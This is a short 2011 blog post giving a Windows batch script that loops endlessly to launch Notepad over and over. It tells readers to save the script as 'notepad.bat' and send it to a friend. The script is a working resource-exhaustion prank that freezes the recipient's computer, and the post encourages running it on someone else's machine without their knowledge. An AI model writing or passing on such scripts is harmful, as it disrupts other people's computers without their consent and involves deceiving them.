Thursday, 20 January 2011

Open Notepad Continously

Just follow these simple steps…
1.Goto Start->Run….
2.Here a dialog box appears…
3.Type Notepad in the location field….
4.Now type the following code in the notepad….
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

5.And save it as “notepad.bat”(without quotes) and send it to your friend………
Please leave the comments after reading the posts…..

No comments:

Post a Comment